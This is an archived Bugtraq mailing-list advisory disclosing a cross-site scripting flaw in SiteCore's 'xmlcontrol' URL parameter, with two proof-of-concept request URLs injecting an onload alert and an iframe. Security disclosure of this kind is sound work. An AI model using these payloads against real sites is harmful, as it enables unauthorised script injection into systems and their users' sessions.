[prev in list] [next in list] [prev in thread] [next in thread] 

List:       bugtraq
Subject:    SiteCore XML Control Script Insertion
From:       Mark Litchfield <mark () securatary ! com>
Date:       2014-01-29 7:10:47
Message-ID: 52E8A977.9030406 () securatary ! com
[Download RAW message or body]

Hey All,

Sitecores “special way” of displaying XML Controls directly allows for a 
Cross Site Scripting Attack – more can be achieved with these XML 
Controls and will be documented in another vulnerability report

http://target/?xmlcontrol=body%20onload=alert(123)
http://target/?xmlcontrol=iframe%20src=https://www.google.com/images/srpr/logo11w.png

More information can be found at 
http://www.securatary.com/vulnerabilities - Also listed is a useful text 
file for use with Burp when auditing SiteCore.


[prev in list] [next in list] [prev in thread] [next in thread]